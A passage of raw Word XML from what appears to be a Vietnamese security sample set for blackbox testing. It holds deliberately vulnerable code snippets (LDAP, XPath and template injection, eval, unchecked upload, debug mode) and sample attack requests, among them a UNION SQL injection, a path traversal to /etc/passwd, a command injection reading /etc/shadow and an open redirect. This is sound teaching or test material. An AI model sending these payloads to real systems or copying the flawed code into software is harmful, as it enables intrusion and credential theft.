    <w:p w14:paraId="3BDCE05A" w14:textId="77777777" w:rsidR="00267103" w:rsidRPr="00267103" w:rsidRDefault="00267103" w:rsidP="00267103">
      <w:r w:rsidRPr="00267103">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>13. LDAP Injection (Java)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2397B44A" w14:textId="77777777" w:rsidR="00267103" w:rsidRPr="00267103" w:rsidRDefault="00267103" w:rsidP="00267103">
      <w:r w:rsidRPr="00267103">
        <w:t>code Java</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DEC3B53" w14:textId="77777777" w:rsidR="00267103" w:rsidRPr="00267103" w:rsidRDefault="00267103" w:rsidP="00267103">
      <w:r w:rsidRPr="00267103">
        <w:t>downloadcontent_copy</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AAC9AB9" w14:textId="77777777" w:rsidR="00267103" w:rsidRPr="00267103" w:rsidRDefault="00267103" w:rsidP="00267103">
      <w:r w:rsidRPr="00267103">
        <w:t>expand_less</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AB86E32" w14:textId="77777777" w:rsidR="00267103" w:rsidRPr="00267103" w:rsidRDefault="00267103" w:rsidP="00267103">
      <w:r w:rsidRPr="00267103">
        <w:t xml:space="preserve">    String filter = "(&amp;(uid=" + user + ")(userPassword=" + pass + "))";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60683679" w14:textId="77777777" w:rsidR="00267103" w:rsidRPr="00267103" w:rsidRDefault="00267103" w:rsidP="00267103">
      <w:r w:rsidRPr="00267103">
        <w:t>NamingEnumeration&lt;SearchResult&gt; results = ctx.search("ou=users,dc=example,dc=com", filter, controls);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18FEB6A5" w14:textId="77777777" w:rsidR="00267103" w:rsidRPr="00267103" w:rsidRDefault="00267103" w:rsidP="00267103">
      <w:r w:rsidRPr="00267103">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EB1A6FD" w14:textId="77777777" w:rsidR="00267103" w:rsidRPr="00267103" w:rsidRDefault="00267103" w:rsidP="00267103">
      <w:r w:rsidRPr="00267103">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>14. Template Injection - SSTI (Python/Jinja2)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="006029F5" w14:textId="77777777" w:rsidR="00267103" w:rsidRPr="00267103" w:rsidRDefault="00267103" w:rsidP="00267103">
      <w:r w:rsidRPr="00267103">
        <w:t>code Python</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04363ACE" w14:textId="77777777" w:rsidR="00267103" w:rsidRPr="00267103" w:rsidRDefault="00267103" w:rsidP="00267103">
      <w:r w:rsidRPr="00267103">
        <w:t>downloadcontent_copy</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F7A970D" w14:textId="77777777" w:rsidR="00267103" w:rsidRPr="00267103" w:rsidRDefault="00267103" w:rsidP="00267103">
      <w:r w:rsidRPr="00267103">
        <w:t>expand_less</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D01A800" w14:textId="77777777" w:rsidR="00267103" w:rsidRPr="00267103" w:rsidRDefault="00267103" w:rsidP="00267103">
      <w:r w:rsidRPr="00267103">
        <w:t xml:space="preserve">    template = "Hello " + request.args.get('name')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1396C63B" w14:textId="77777777" w:rsidR="00267103" w:rsidRPr="00267103" w:rsidRDefault="00267103" w:rsidP="00267103">
      <w:r w:rsidRPr="00267103">
        <w:t>return render_template_string(template)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A3F8670" w14:textId="77777777" w:rsidR="00267103" w:rsidRPr="00267103" w:rsidRDefault="00267103" w:rsidP="00267103">
      <w:r w:rsidRPr="00267103">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12152CFA" w14:textId="77777777" w:rsidR="00267103" w:rsidRPr="00267103" w:rsidRDefault="00267103" w:rsidP="00267103">
      <w:r w:rsidRPr="00267103">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>15. Weak Randomness (PHP)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="516B2A14" w14:textId="77777777" w:rsidR="00267103" w:rsidRPr="00267103" w:rsidRDefault="00267103" w:rsidP="00267103">
      <w:r w:rsidRPr="00267103">
        <w:t>code PHP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="173A2CC1" w14:textId="77777777" w:rsidR="00267103" w:rsidRPr="00267103" w:rsidRDefault="00267103" w:rsidP="00267103">
      <w:r w:rsidRPr="00267103">
        <w:t>downloadcontent_copy</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DD39E10" w14:textId="77777777" w:rsidR="00267103" w:rsidRPr="00267103" w:rsidRDefault="00267103" w:rsidP="00267103">
      <w:r w:rsidRPr="00267103">
        <w:t>expand_less</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A639D43" w14:textId="77777777" w:rsidR="00267103" w:rsidRPr="00267103" w:rsidRDefault="00267103" w:rsidP="00267103">
      <w:r w:rsidRPr="00267103">
        <w:t xml:space="preserve">    $token = md5(time());</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A94D7D3" w14:textId="77777777" w:rsidR="00267103" w:rsidRPr="00267103" w:rsidRDefault="00267103" w:rsidP="00267103">
      <w:r w:rsidRPr="00267103">
        <w:t>// Time is predictable, making the token guessable</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B28943E" w14:textId="77777777" w:rsidR="00267103" w:rsidRPr="00267103" w:rsidRDefault="00267103" w:rsidP="00267103">
      <w:r w:rsidRPr="00267103">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6ECBD926" w14:textId="77777777" w:rsidR="00267103" w:rsidRPr="00267103" w:rsidRDefault="00267103" w:rsidP="00267103">
      <w:r w:rsidRPr="00267103">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>16. File Upload (PHP)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D5683B6" w14:textId="77777777" w:rsidR="00267103" w:rsidRPr="00267103" w:rsidRDefault="00267103" w:rsidP="00267103">
      <w:r w:rsidRPr="00267103">
        <w:t>code PHP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B07AF2B" w14:textId="77777777" w:rsidR="00267103" w:rsidRPr="00267103" w:rsidRDefault="00267103" w:rsidP="00267103">
      <w:r w:rsidRPr="00267103">
        <w:t>downloadcontent_copy</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10D7B421" w14:textId="77777777" w:rsidR="00267103" w:rsidRPr="00267103" w:rsidRDefault="00267103" w:rsidP="00267103">
      <w:r w:rsidRPr="00267103">
        <w:t>expand_less</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E260F9C" w14:textId="77777777" w:rsidR="00267103" w:rsidRPr="00267103" w:rsidRDefault="00267103" w:rsidP="00267103">
      <w:r w:rsidRPr="00267103">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">    $target_dir = "uploads/";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5531A14C" w14:textId="77777777" w:rsidR="00267103" w:rsidRPr="00267103" w:rsidRDefault="00267103" w:rsidP="00267103">
      <w:r w:rsidRPr="00267103">
        <w:t>$target_file = $target_dir . basename($_FILES["fileToUpload"]["name"]);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C05C157" w14:textId="77777777" w:rsidR="00267103" w:rsidRPr="00267103" w:rsidRDefault="00267103" w:rsidP="00267103">
      <w:r w:rsidRPr="00267103">
        <w:t>move_uploaded_file($_FILES["fileToUpload"]["tmp_name"], $target_file);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33D7138D" w14:textId="77777777" w:rsidR="00267103" w:rsidRPr="00267103" w:rsidRDefault="00267103" w:rsidP="00267103">
      <w:r w:rsidRPr="00267103">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D15E642" w14:textId="77777777" w:rsidR="00267103" w:rsidRPr="00267103" w:rsidRDefault="00267103" w:rsidP="00267103">
      <w:r w:rsidRPr="00267103">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>17. Eval Injection (Python)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C2F4A3E" w14:textId="77777777" w:rsidR="00267103" w:rsidRPr="00267103" w:rsidRDefault="00267103" w:rsidP="00267103">
      <w:r w:rsidRPr="00267103">
        <w:t>code Python</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D400551" w14:textId="77777777" w:rsidR="00267103" w:rsidRPr="00267103" w:rsidRDefault="00267103" w:rsidP="00267103">
      <w:r w:rsidRPr="00267103">
        <w:t>downloadcontent_copy</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C18B145" w14:textId="77777777" w:rsidR="00267103" w:rsidRPr="00267103" w:rsidRDefault="00267103" w:rsidP="00267103">
      <w:r w:rsidRPr="00267103">
        <w:t>expand_less</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A556A6D" w14:textId="77777777" w:rsidR="00267103" w:rsidRPr="00267103" w:rsidRDefault="00267103" w:rsidP="00267103">
      <w:r w:rsidRPr="00267103">
        <w:t xml:space="preserve">    expression = request.args.get('calc')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29E0A094" w14:textId="77777777" w:rsidR="00267103" w:rsidRPr="00267103" w:rsidRDefault="00267103" w:rsidP="00267103">
      <w:r w:rsidRPr="00267103">
        <w:t>result = eval(expression)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="297D2476" w14:textId="77777777" w:rsidR="00267103" w:rsidRPr="00267103" w:rsidRDefault="00267103" w:rsidP="00267103">
      <w:r w:rsidRPr="00267103">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40EC7C6A" w14:textId="77777777" w:rsidR="00267103" w:rsidRPr="00267103" w:rsidRDefault="00267103" w:rsidP="00267103">
      <w:r w:rsidRPr="00267103">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>18. Header Injection (PHP)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B6DB52A" w14:textId="77777777" w:rsidR="00267103" w:rsidRPr="00267103" w:rsidRDefault="00267103" w:rsidP="00267103">
      <w:r w:rsidRPr="00267103">
        <w:t>code PHP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4ACBF11C" w14:textId="77777777" w:rsidR="00267103" w:rsidRPr="00267103" w:rsidRDefault="00267103" w:rsidP="00267103">
      <w:r w:rsidRPr="00267103">
        <w:t>downloadcontent_copy</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CEDABBF" w14:textId="77777777" w:rsidR="00267103" w:rsidRPr="00267103" w:rsidRDefault="00267103" w:rsidP="00267103">
      <w:r w:rsidRPr="00267103">
        <w:t>expand_less</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14E2796F" w14:textId="77777777" w:rsidR="00267103" w:rsidRPr="00267103" w:rsidRDefault="00267103" w:rsidP="00267103">
      <w:r w:rsidRPr="00267103">
        <w:t xml:space="preserve">    header("Location: " . $_GET['url']);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F594FE5" w14:textId="77777777" w:rsidR="00267103" w:rsidRPr="00267103" w:rsidRDefault="00267103" w:rsidP="00267103">
      <w:r w:rsidRPr="00267103">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="305AE35A" w14:textId="77777777" w:rsidR="00267103" w:rsidRPr="00267103" w:rsidRDefault="00267103" w:rsidP="00267103">
      <w:r w:rsidRPr="00267103">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>19. XPath Injection (C#)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29D0C166" w14:textId="77777777" w:rsidR="00267103" w:rsidRPr="00267103" w:rsidRDefault="00267103" w:rsidP="00267103">
      <w:r w:rsidRPr="00267103">
        <w:t>code C#</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48982764" w14:textId="77777777" w:rsidR="00267103" w:rsidRPr="00267103" w:rsidRDefault="00267103" w:rsidP="00267103">
      <w:r w:rsidRPr="00267103">
        <w:t>downloadcontent_copy</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="102C1028" w14:textId="77777777" w:rsidR="00267103" w:rsidRPr="00267103" w:rsidRDefault="00267103" w:rsidP="00267103">
      <w:r w:rsidRPr="00267103">
        <w:t>expand_less</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0574866F" w14:textId="77777777" w:rsidR="00267103" w:rsidRPr="00267103" w:rsidRDefault="00267103" w:rsidP="00267103">
      <w:r w:rsidRPr="00267103">
        <w:t xml:space="preserve">    string xpath = "//User[UserName/text()='" + user + "' and Password/text()='" + pass + "']";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6255F0C4" w14:textId="77777777" w:rsidR="00267103" w:rsidRPr="00267103" w:rsidRDefault="00267103" w:rsidP="00267103">
      <w:r w:rsidRPr="00267103">
        <w:t>XmlNode node = doc.SelectSingleNode(xpath);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="160281FF" w14:textId="77777777" w:rsidR="00267103" w:rsidRPr="00267103" w:rsidRDefault="00267103" w:rsidP="00267103">
      <w:r w:rsidRPr="00267103">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7941D199" w14:textId="77777777" w:rsidR="00267103" w:rsidRPr="00267103" w:rsidRDefault="00267103" w:rsidP="00267103">
      <w:r w:rsidRPr="00267103">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>20. Debug Mode Enabled (Django)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D12E319" w14:textId="77777777" w:rsidR="00267103" w:rsidRPr="00267103" w:rsidRDefault="00267103" w:rsidP="00267103">
      <w:r w:rsidRPr="00267103">
        <w:t>code Python</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="089F347D" w14:textId="77777777" w:rsidR="00267103" w:rsidRPr="00267103" w:rsidRDefault="00267103" w:rsidP="00267103">
      <w:r w:rsidRPr="00267103">
        <w:lastRenderedPageBreak/>
        <w:t>downloadcontent_copy</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EAD635E" w14:textId="77777777" w:rsidR="00267103" w:rsidRPr="00267103" w:rsidRDefault="00267103" w:rsidP="00267103">
      <w:r w:rsidRPr="00267103">
        <w:t>expand_less</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CCA03AF" w14:textId="77777777" w:rsidR="00267103" w:rsidRPr="00267103" w:rsidRDefault="00267103" w:rsidP="00267103">
      <w:r w:rsidRPr="00267103">
        <w:t xml:space="preserve">    # settings.py</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CFC380D" w14:textId="77777777" w:rsidR="00267103" w:rsidRPr="00267103" w:rsidRDefault="00267103" w:rsidP="00267103">
      <w:r w:rsidRPr="00267103">
        <w:t>DEBUG = True</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62FF1EA4" w14:textId="77777777" w:rsidR="00267103" w:rsidRPr="00267103" w:rsidRDefault="00267103" w:rsidP="00267103">
      <w:r w:rsidRPr="00267103">
        <w:t>ALLOWED_HOSTS = ['*']</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70476433" w14:textId="77777777" w:rsidR="00267103" w:rsidRPr="00267103" w:rsidRDefault="00267103" w:rsidP="00267103">
      <w:r w:rsidRPr="00267103">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DDBE492" w14:textId="77777777" w:rsidR="00267103" w:rsidRPr="00267103" w:rsidRDefault="00000000" w:rsidP="00267103">
      <w:r>
        <w:pict w14:anchorId="4E48CA38">
          <v:rect id="_x0000_i1026" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="77DCB28A" w14:textId="77777777" w:rsidR="00267103" w:rsidRPr="00267103" w:rsidRDefault="00267103" w:rsidP="00267103">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00267103">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>🔵</w:t>
      </w:r>
      <w:r w:rsidRPr="00267103">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> PHẦN 2: 20 URL &amp; HTTP REQUESTS (Blackbox Testing)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68BA61EC" w14:textId="77777777" w:rsidR="00267103" w:rsidRPr="00267103" w:rsidRDefault="00267103" w:rsidP="00267103">
      <w:r w:rsidRPr="00267103">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Những mẫu này giả lập input từ Burp Suite hoặc Log server.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="514B9C6F" w14:textId="77777777" w:rsidR="00267103" w:rsidRPr="00267103" w:rsidRDefault="00267103" w:rsidP="00267103">
      <w:r w:rsidRPr="00267103">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>1. SQL Injection (Union Based)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CBD3845" w14:textId="77777777" w:rsidR="00267103" w:rsidRPr="00267103" w:rsidRDefault="00267103" w:rsidP="00267103">
      <w:r w:rsidRPr="00267103">
        <w:t>code Http</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6224A91F" w14:textId="77777777" w:rsidR="00267103" w:rsidRPr="00267103" w:rsidRDefault="00267103" w:rsidP="00267103">
      <w:r w:rsidRPr="00267103">
        <w:t>downloadcontent_copy</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33790658" w14:textId="77777777" w:rsidR="00267103" w:rsidRPr="00267103" w:rsidRDefault="00267103" w:rsidP="00267103">
      <w:r w:rsidRPr="00267103">
        <w:t>expand_less</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44F53004" w14:textId="77777777" w:rsidR="00267103" w:rsidRPr="00267103" w:rsidRDefault="00267103" w:rsidP="00267103">
      <w:r w:rsidRPr="00267103">
        <w:t xml:space="preserve">    GET /products?id=1' UNION SELECT user, password FROM users-- HTTP/1.1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D3FDF53" w14:textId="77777777" w:rsidR="00267103" w:rsidRPr="00267103" w:rsidRDefault="00267103" w:rsidP="00267103">
      <w:r w:rsidRPr="00267103">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66672CC5" w14:textId="77777777" w:rsidR="00267103" w:rsidRPr="00267103" w:rsidRDefault="00267103" w:rsidP="00267103">
      <w:r w:rsidRPr="00267103">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>2. Reflected XSS (Script Tag)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F2D758F" w14:textId="77777777" w:rsidR="00267103" w:rsidRPr="00267103" w:rsidRDefault="00267103" w:rsidP="00267103">
      <w:r w:rsidRPr="00267103">
        <w:t>code Http</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E03A952" w14:textId="77777777" w:rsidR="00267103" w:rsidRPr="00267103" w:rsidRDefault="00267103" w:rsidP="00267103">
      <w:r w:rsidRPr="00267103">
        <w:t>downloadcontent_copy</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D83755F" w14:textId="77777777" w:rsidR="00267103" w:rsidRPr="00267103" w:rsidRDefault="00267103" w:rsidP="00267103">
      <w:r w:rsidRPr="00267103">
        <w:t>expand_less</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="173A9B66" w14:textId="77777777" w:rsidR="00267103" w:rsidRPr="00267103" w:rsidRDefault="00267103" w:rsidP="00267103">
      <w:r w:rsidRPr="00267103">
        <w:t xml:space="preserve">    GET /search?q=&lt;script&gt;alert('XSS')&lt;/script&gt; HTTP/1.1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E686262" w14:textId="77777777" w:rsidR="00267103" w:rsidRPr="00267103" w:rsidRDefault="00267103" w:rsidP="00267103">
      <w:r w:rsidRPr="00267103">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45932AA2" w14:textId="77777777" w:rsidR="00267103" w:rsidRPr="00267103" w:rsidRDefault="00267103" w:rsidP="00267103">
      <w:r w:rsidRPr="00267103">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3. Path Traversal (Etc Passwd)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39D76B4F" w14:textId="77777777" w:rsidR="00267103" w:rsidRPr="00267103" w:rsidRDefault="00267103" w:rsidP="00267103">
      <w:r w:rsidRPr="00267103">
        <w:t>code Http</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="183C831A" w14:textId="77777777" w:rsidR="00267103" w:rsidRPr="00267103" w:rsidRDefault="00267103" w:rsidP="00267103">
      <w:r w:rsidRPr="00267103">
        <w:t>downloadcontent_copy</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="647E4845" w14:textId="77777777" w:rsidR="00267103" w:rsidRPr="00267103" w:rsidRDefault="00267103" w:rsidP="00267103">
      <w:r w:rsidRPr="00267103">
        <w:t>expand_less</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BA77860" w14:textId="77777777" w:rsidR="00267103" w:rsidRPr="00267103" w:rsidRDefault="00267103" w:rsidP="00267103">
      <w:r w:rsidRPr="00267103">
        <w:t xml:space="preserve">    GET /images?file=../../../../etc/passwd HTTP/1.1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42C1D7A3" w14:textId="77777777" w:rsidR="00267103" w:rsidRPr="00267103" w:rsidRDefault="00267103" w:rsidP="00267103">
      <w:r w:rsidRPr="00267103">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="217A5D1C" w14:textId="77777777" w:rsidR="00267103" w:rsidRPr="00267103" w:rsidRDefault="00267103" w:rsidP="00267103">
      <w:r w:rsidRPr="00267103">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>4. Command Injection (Shell)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E52CD4A" w14:textId="77777777" w:rsidR="00267103" w:rsidRPr="00267103" w:rsidRDefault="00267103" w:rsidP="00267103">
      <w:r w:rsidRPr="00267103">
        <w:t>code Http</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="799A9314" w14:textId="77777777" w:rsidR="00267103" w:rsidRPr="00267103" w:rsidRDefault="00267103" w:rsidP="00267103">
      <w:r w:rsidRPr="00267103">
        <w:t>downloadcontent_copy</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A096891" w14:textId="77777777" w:rsidR="00267103" w:rsidRPr="00267103" w:rsidRDefault="00267103" w:rsidP="00267103">
      <w:r w:rsidRPr="00267103">
        <w:t>expand_less</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15FD57B9" w14:textId="77777777" w:rsidR="00267103" w:rsidRPr="00267103" w:rsidRDefault="00267103" w:rsidP="00267103">
      <w:r w:rsidRPr="00267103">
        <w:t xml:space="preserve">    POST /dns-lookup HTTP/1.1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="331B0DE7" w14:textId="77777777" w:rsidR="00267103" w:rsidRPr="00267103" w:rsidRDefault="00267103" w:rsidP="00267103">
      <w:r w:rsidRPr="00267103">
        <w:t>domain=google.com; cat /etc/shadow</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FF12B83" w14:textId="77777777" w:rsidR="00267103" w:rsidRPr="00267103" w:rsidRDefault="00267103" w:rsidP="00267103">
      <w:r w:rsidRPr="00267103">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="521F1D33" w14:textId="77777777" w:rsidR="00267103" w:rsidRPr="00267103" w:rsidRDefault="00267103" w:rsidP="00267103">
      <w:r w:rsidRPr="00267103">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>5. SQL Injection (Boolean Based)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EB01ADA" w14:textId="77777777" w:rsidR="00267103" w:rsidRPr="00267103" w:rsidRDefault="00267103" w:rsidP="00267103">
      <w:r w:rsidRPr="00267103">
        <w:t>code Http</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1502D133" w14:textId="77777777" w:rsidR="00267103" w:rsidRPr="00267103" w:rsidRDefault="00267103" w:rsidP="00267103">
      <w:r w:rsidRPr="00267103">
        <w:t>downloadcontent_copy</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28204741" w14:textId="77777777" w:rsidR="00267103" w:rsidRPr="00267103" w:rsidRDefault="00267103" w:rsidP="00267103">
      <w:r w:rsidRPr="00267103">
        <w:t>expand_less</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="795A4527" w14:textId="77777777" w:rsidR="00267103" w:rsidRPr="00267103" w:rsidRDefault="00267103" w:rsidP="00267103">
      <w:r w:rsidRPr="00267103">
        <w:t xml:space="preserve">    GET /login?user=admin' AND 1=1-- HTTP/1.1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="171BE062" w14:textId="77777777" w:rsidR="00267103" w:rsidRPr="00267103" w:rsidRDefault="00267103" w:rsidP="00267103">
      <w:r w:rsidRPr="00267103">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="237BC2C8" w14:textId="77777777" w:rsidR="00267103" w:rsidRPr="00267103" w:rsidRDefault="00267103" w:rsidP="00267103">
      <w:r w:rsidRPr="00267103">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>6. Local File Inclusion (LFI - Null Byte)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DEC2874" w14:textId="77777777" w:rsidR="00267103" w:rsidRPr="00267103" w:rsidRDefault="00267103" w:rsidP="00267103">
      <w:r w:rsidRPr="00267103">
        <w:t>code Http</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47D8D404" w14:textId="77777777" w:rsidR="00267103" w:rsidRPr="00267103" w:rsidRDefault="00267103" w:rsidP="00267103">
      <w:r w:rsidRPr="00267103">
        <w:t>downloadcontent_copy</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="644A6A2E" w14:textId="77777777" w:rsidR="00267103" w:rsidRPr="00267103" w:rsidRDefault="00267103" w:rsidP="00267103">
      <w:r w:rsidRPr="00267103">
        <w:t>expand_less</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15D8408E" w14:textId="77777777" w:rsidR="00267103" w:rsidRPr="00267103" w:rsidRDefault="00267103" w:rsidP="00267103">
      <w:r w:rsidRPr="00267103">
        <w:t xml:space="preserve">    GET /index.php?page=/var/log/apache/access.log%00 HTTP/1.1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="243132E6" w14:textId="77777777" w:rsidR="00267103" w:rsidRPr="00267103" w:rsidRDefault="00267103" w:rsidP="00267103">
      <w:r w:rsidRPr="00267103">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E7A5496" w14:textId="77777777" w:rsidR="00267103" w:rsidRPr="00267103" w:rsidRDefault="00267103" w:rsidP="00267103">
      <w:r w:rsidRPr="00267103">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>7. Open Redirect</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="060BA65C" w14:textId="77777777" w:rsidR="00267103" w:rsidRPr="00267103" w:rsidRDefault="00267103" w:rsidP="00267103">
      <w:r w:rsidRPr="00267103">
        <w:t>code Http</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07F9BCD1" w14:textId="77777777" w:rsidR="00267103" w:rsidRPr="00267103" w:rsidRDefault="00267103" w:rsidP="00267103">
      <w:r w:rsidRPr="00267103">
        <w:t>downloadcontent_copy</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12CD438B" w14:textId="77777777" w:rsidR="00267103" w:rsidRPr="00267103" w:rsidRDefault="00267103" w:rsidP="00267103">
      <w:r w:rsidRPr="00267103">
        <w:t>expand_less</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67A4E603" w14:textId="77777777" w:rsidR="00267103" w:rsidRPr="00267103" w:rsidRDefault="00267103" w:rsidP="00267103">
      <w:r w:rsidRPr="00267103">
        <w:t xml:space="preserve">    GET /logout?next=http://evil-phishing.com HTTP/1.1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C18FBF9" w14:textId="77777777" w:rsidR="00267103" w:rsidRPr="00267103" w:rsidRDefault="00267103" w:rsidP="00267103">
      <w:r w:rsidRPr="00267103">
